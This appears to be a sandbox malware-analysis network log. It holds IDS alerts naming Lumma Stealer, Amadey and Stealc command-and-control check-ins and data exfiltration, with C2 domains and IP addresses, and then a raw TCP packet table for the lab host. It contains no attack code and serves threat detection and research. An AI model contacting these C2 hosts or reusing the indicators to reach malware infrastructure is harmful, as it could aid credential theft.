2024-11-10T04:56:28.051158+0100	2057120	ET MALWARE Observed Win32/Lumma Stealer Related Domain (navygenerayk .store in TLS SNI)	1	192.168.2.5	50142	188.114.97.3	443	TCP
2024-11-10T04:56:28.051158+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	50142	188.114.97.3	443	TCP
2024-11-10T04:56:29.750080+0100	2057120	ET MALWARE Observed Win32/Lumma Stealer Related Domain (navygenerayk .store in TLS SNI)	1	192.168.2.5	50144	188.114.97.3	443	TCP
2024-11-10T04:56:29.750080+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	50144	188.114.97.3	443	TCP
2024-11-10T04:56:31.605717+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.5	50144	188.114.97.3	443	TCP
2024-11-10T04:56:32.642250+0100	2057120	ET MALWARE Observed Win32/Lumma Stealer Related Domain (navygenerayk .store in TLS SNI)	1	192.168.2.5	50149	188.114.97.3	443	TCP
2024-11-10T04:56:32.642250+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	50149	188.114.97.3	443	TCP
2024-11-10T04:56:32.725932+0100	2843864	ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2	1	192.168.2.5	50149	188.114.97.3	443	TCP
2024-11-10T04:56:35.969608+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.5	50150	185.215.113.43	80	TCP
2024-11-10T04:56:36.681774+0100	2044243	ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in	1	192.168.2.5	50151	185.215.113.206	80	TCP
2024-11-10T04:56:37.286610+0100	2057120	ET MALWARE Observed Win32/Lumma Stealer Related Domain (navygenerayk .store in TLS SNI)	1	192.168.2.5	50153	188.114.97.3	443	TCP
2024-11-10T04:56:37.286610+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	50153	188.114.97.3	443	TCP
2024-11-10T04:56:38.256803+0100	2057131	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (presticitpo .store)	1	192.168.2.5	62570	1.1.1.1	53	UDP
2024-11-10T04:56:38.285826+0100	2057129	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crisiwarny .store)	1	192.168.2.5	60436	1.1.1.1	53	UDP
2024-11-10T04:56:38.311766+0100	2057127	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fadehairucw .store)	1	192.168.2.5	63685	1.1.1.1	53	UDP
2024-11-10T04:56:38.339782+0100	2057125	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (thumbystriw .store)	1	192.168.2.5	56464	1.1.1.1	53	UDP
2024-11-10T04:56:38.364400+0100	2057123	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (necklacedmny .store)	1	192.168.2.5	51739	1.1.1.1	53	UDP
2024-11-10T04:56:38.387680+0100	2057121	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (founpiuer .store)	1	192.168.2.5	62277	1.1.1.1	53	UDP
2024-11-10T04:56:39.034746+0100	2057120	ET MALWARE Observed Win32/Lumma Stealer Related Domain (navygenerayk .store in TLS SNI)	1	192.168.2.5	50154	188.114.97.3	443	TCP
2024-11-10T04:56:39.034746+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	50154	188.114.97.3	443	TCP
2024-11-10T04:56:39.895991+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.5	50155	185.215.113.43	80	TCP
2024-11-10T04:56:40.427414+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	50153	188.114.97.3	443	TCP
2024-11-10T04:56:40.839144+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.5	50156	185.215.113.16	80	TCP
2024-11-10T04:56:40.866498+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.5	50154	188.114.97.3	443	TCP
2024-11-10T04:56:40.866498+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	50154	188.114.97.3	443	TCP
2024-11-10T04:56:41.574133+0100	2057120	ET MALWARE Observed Win32/Lumma Stealer Related Domain (navygenerayk .store in TLS SNI)	1	192.168.2.5	50159	188.114.97.3	443	TCP
2024-11-10T04:56:41.574133+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	50159	188.114.97.3	443	TCP
2024-11-10T04:56:41.631406+0100	2019714	ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile	2	192.168.2.5	50158	185.215.113.16	80	TCP
2024-11-10T04:56:42.462241+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.5	50159	188.114.97.3	443	TCP
2024-11-10T04:56:42.462241+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	50159	188.114.97.3	443	TCP
2024-11-10T04:56:43.831851+0100	2057120	ET MALWARE Observed Win32/Lumma Stealer Related Domain (navygenerayk .store in TLS SNI)	1	192.168.2.5	50160	188.114.97.3	443	TCP
2024-11-10T04:56:43.831851+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	50160	188.114.97.3	443	TCP
2024-11-10T04:56:45.674896+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.5	50162	185.215.113.43	80	TCP
2024-11-10T04:56:46.542401+0100	2057120	ET MALWARE Observed Win32/Lumma Stealer Related Domain (navygenerayk .store in TLS SNI)	1	192.168.2.5	50163	188.114.97.3	443	TCP
2024-11-10T04:56:46.542401+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	50163	188.114.97.3	443	TCP
2024-11-10T04:56:48.903216+0100	2057120	ET MALWARE Observed Win32/Lumma Stealer Related Domain (navygenerayk .store in TLS SNI)	1	192.168.2.5	50165	188.114.97.3	443	TCP
2024-11-10T04:56:48.903216+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	50165	188.114.97.3	443	TCP
2024-11-10T04:56:53.140066+0100	2057120	ET MALWARE Observed Win32/Lumma Stealer Related Domain (navygenerayk .store in TLS SNI)	1	192.168.2.5	50175	188.114.97.3	443	TCP
2024-11-10T04:56:53.140066+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	50175	188.114.97.3	443	TCP
2024-11-10T04:56:55.819106+0100	2057120	ET MALWARE Observed Win32/Lumma Stealer Related Domain (navygenerayk .store in TLS SNI)	1	192.168.2.5	50181	188.114.97.3	443	TCP
2024-11-10T04:56:55.819106+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	50181	188.114.97.3	443	TCP
2024-11-10T04:56:58.794845+0100	2843864	ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2	1	192.168.2.5	50181	188.114.97.3	443	TCP
2024-11-10T04:56:59.586073+0100	2057120	ET MALWARE Observed Win32/Lumma Stealer Related Domain (navygenerayk .store in TLS SNI)	1	192.168.2.5	50204	188.114.97.3	443	TCP
2024-11-10T04:56:59.586073+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	50204	188.114.97.3	443	TCP
2024-11-10T04:57:00.244360+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	50204	188.114.97.3	443	TCP
2024-11-10T04:57:05.281063+0100	2057131	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (presticitpo .store)	1	192.168.2.5	50231	1.1.1.1	53	UDP
2024-11-10T04:57:05.306749+0100	2057129	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crisiwarny .store)	1	192.168.2.5	64332	1.1.1.1	53	UDP
2024-11-10T04:57:05.333512+0100	2057127	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fadehairucw .store)	1	192.168.2.5	58636	1.1.1.1	53	UDP
2024-11-10T04:57:05.359174+0100	2057125	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (thumbystriw .store)	1	192.168.2.5	55979	1.1.1.1	53	UDP
2024-11-10T04:57:05.382130+0100	2057123	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (necklacedmny .store)	1	192.168.2.5	52614	1.1.1.1	53	UDP
2024-11-10T04:57:05.407972+0100	2057121	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (founpiuer .store)	1	192.168.2.5	63365	1.1.1.1	53	UDP
2024-11-10T04:57:06.053797+0100	2057120	ET MALWARE Observed Win32/Lumma Stealer Related Domain (navygenerayk .store in TLS SNI)	1	192.168.2.5	50249	188.114.97.3	443	TCP
2024-11-10T04:57:06.053797+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	50249	188.114.97.3	443	TCP
2024-11-10T04:57:07.951742+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.5	50249	188.114.97.3	443	TCP
2024-11-10T04:57:07.951742+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	50249	188.114.97.3	443	TCP
2024-11-10T04:57:08.646736+0100	2057120	ET MALWARE Observed Win32/Lumma Stealer Related Domain (navygenerayk .store in TLS SNI)	1	192.168.2.5	50256	188.114.97.3	443	TCP
2024-11-10T04:57:08.646736+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	50256	188.114.97.3	443	TCP
2024-11-10T04:57:09.374105+0100	2044243	ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in	1	192.168.2.5	50255	185.215.113.206	80	TCP
2024-11-10T04:57:09.812134+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.5	50256	188.114.97.3	443	TCP
2024-11-10T04:57:09.812134+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	50256	188.114.97.3	443	TCP
2024-11-10T04:57:17.074281+0100	2057120	ET MALWARE Observed Win32/Lumma Stealer Related Domain (navygenerayk .store in TLS SNI)	1	192.168.2.5	50260	188.114.97.3	443	TCP
2024-11-10T04:57:17.074281+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	50260	188.114.97.3	443	TCP
2024-11-10T04:57:18.150922+0100	2044243	ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in	1	192.168.2.5	50261	185.215.113.206	80	TCP
2024-11-10T04:57:26.034158+0100	2057120	ET MALWARE Observed Win32/Lumma Stealer Related Domain (navygenerayk .store in TLS SNI)	1	192.168.2.5	50265	188.114.97.3	443	TCP
2024-11-10T04:57:26.034158+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	50265	188.114.97.3	443	TCP
2024-11-10T04:57:28.343752+0100	2057120	ET MALWARE Observed Win32/Lumma Stealer Related Domain (navygenerayk .store in TLS SNI)	1	192.168.2.5	50267	188.114.97.3	443	TCP
2024-11-10T04:57:28.343752+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	50267	188.114.97.3	443	TCP
2024-11-10T04:57:33.094118+0100	2044243	ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in	1	192.168.2.5	50273	185.215.113.206	80	TCP
2024-11-10T04:57:34.573247+0100	2057121	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (founpiuer .store)	1	192.168.2.5	49943	1.1.1.1	53	UDP
2024-11-10T04:57:34.775431+0100	2057120	ET MALWARE Observed Win32/Lumma Stealer Related Domain (navygenerayk .store in TLS SNI)	1	192.168.2.5	50275	188.114.97.3	443	TCP
2024-11-10T04:57:34.775431+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	50275	188.114.97.3	443	TCP
2024-11-10T04:57:36.836946+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.5	50275	188.114.97.3	443	TCP
2024-11-10T04:57:38.006556+0100	2057120	ET MALWARE Observed Win32/Lumma Stealer Related Domain (navygenerayk .store in TLS SNI)	1	192.168.2.5	50277	188.114.97.3	443	TCP
2024-11-10T04:57:38.006556+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	50277	188.114.97.3	443	TCP
2024-11-10T04:57:38.010244+0100	2843864	ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2	1	192.168.2.5	50277	188.114.97.3	443	TCP
2024-11-10T04:57:40.998751+0100	2057120	ET MALWARE Observed Win32/Lumma Stealer Related Domain (navygenerayk .store in TLS SNI)	1	192.168.2.5	50279	188.114.97.3	443	TCP
2024-11-10T04:57:40.998751+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	50279	188.114.97.3	443	TCP
2024-11-10T04:57:41.703453+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	50279	188.114.97.3	443	TCP
2024-11-10T04:57:48.631192+0100	2044243	ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in	1	192.168.2.5	50284	185.215.113.206	80	TCP
2024-11-10T04:57:57.446192+0100	2057121	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (founpiuer .store)	1	192.168.2.5	61469	1.1.1.1	53	UDP
2024-11-10T04:58:10.090309+0100	2057121	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (founpiuer .store)	1	192.168.2.5	57859	1.1.1.1	53	UDP
2024-11-10T04:58:27.197662+0100	2057121	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (founpiuer .store)	1	192.168.2.5	51185	1.1.1.1	53	UDP
2024-11-10T04:59:14.024592+0100	2057121	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (founpiuer .store)	1	192.168.2.5	53250	1.1.1.1	53	UDP
2024-11-10T04:59:45.297847+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	50350	51.11.192.48	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 10, 2024 04:54:50.988289118 CET	49675	443	192.168.2.5	23.1.237.91
Nov 10, 2024 04:54:50.988293886 CET	49674	443	192.168.2.5	23.1.237.91
Nov 10, 2024 04:54:51.128871918 CET	49673	443	192.168.2.5	23.1.237.91
Nov 10, 2024 04:54:58.094708920 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:54:58.099442005 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:54:58.099543095 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:54:58.099654913 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:54:58.104331017 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:54:59.006438017 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:54:59.006520033 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:54:59.009727955 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:54:59.014522076 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:54:59.307391882 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:54:59.307490110 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:54:59.308687925 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:54:59.313541889 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:54:59.589135885 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:54:59.589150906 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:54:59.589220047 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:54:59.590853930 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:54:59.595642090 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:54:59.871685982 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:54:59.871700048 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:54:59.871711016 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:54:59.871721029 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:54:59.871732950 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:54:59.871782064 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:54:59.871824980 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:54:59.871824980 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:54:59.871836901 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:54:59.871865988 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:54:59.871889114 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:54:59.876475096 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:54:59.882205963 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:00.155689955 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:00.155761003 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:00.262255907 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:00.262290001 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:00.267252922 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:00.267282009 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:00.267291069 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:00.267307997 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:00.267354012 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:00.267410040 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:00.267419100 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:00.597553015 CET	49674	443	192.168.2.5	23.1.237.91
Nov 10, 2024 04:55:00.597553968 CET	49675	443	192.168.2.5	23.1.237.91
Nov 10, 2024 04:55:00.738193035 CET	49673	443	192.168.2.5	23.1.237.91
Nov 10, 2024 04:55:01.065853119 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:01.065999031 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:01.342032909 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:01.347799063 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:01.620311022 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:01.620326042 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:01.620337009 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:01.620352983 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:01.620362043 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:01.620388031 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:01.620425940 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:01.620562077 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:01.620609999 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:01.620640039 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:01.620651007 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:01.620682001 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:01.620692015 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:01.621061087 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:01.621071100 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:01.621082067 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:01.621094942 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:01.621104956 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:01.621108055 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:01.621129990 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:01.621153116 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:01.621762037 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:01.621802092 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:01.772536993 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:01.772548914 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:01.772562027 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:01.772612095 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:01.772643089 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:01.772644997 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:01.772666931 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:01.772684097 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:01.772715092 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:01.772764921 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:01.772775888 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:01.772783995 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:01.772809029 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:01.772834063 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:01.773135900 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:01.773147106 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:01.773155928 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:01.773186922 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:01.773199081 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:01.773475885 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:01.773499012 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:01.773519993 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:01.773525000 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:01.773530960 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:01.773540020 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:01.773549080 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:01.773549080 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:01.773550034 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:01.773576021 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:01.773597002 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:01.774399996 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:01.774410009 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:01.774432898 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:01.774442911 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:01.774452925 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:01.774455070 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:01.774461985 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:01.774468899 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:01.774494886 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:01.775238991 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:01.775249004 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:01.775259018 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:01.775280952 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:01.775296926 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:01.924835920 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:01.924863100 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:01.924874067 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:01.924884081 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:01.924912930 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:01.924926996 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:01.924932957 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:01.924940109 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:01.924984932 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:01.925091982 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:01.925116062 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:01.925126076 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:01.925148964 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:01.925164938 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:01.925324917 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:01.925334930 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:01.925345898 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:01.925375938 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:01.925379992 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:01.925389051 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:01.925400019 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:01.925405979 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:01.925430059 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:01.925890923 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:01.925924063 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:01.925935984 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:01.925946951 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:01.925947905 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:01.925957918 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:01.925967932 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:01.925967932 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:01.925976038 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:01.926012039 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:01.926371098 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:01.926422119 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:01.926485062 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:01.926496983 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:01.926508904 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:01.926518917 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:01.926529884 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:01.926531076 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:01.926558018 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:01.926574945 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:01.926935911 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:01.926947117 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:01.926958084 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:01.926984072 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:01.926986933 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:01.926996946 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:01.926996946 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:01.927006960 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:01.927031994 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:01.927032948 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:01.927043915 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:01.927057981 CET	49704	80	192.168.2.5	185.215.113.206
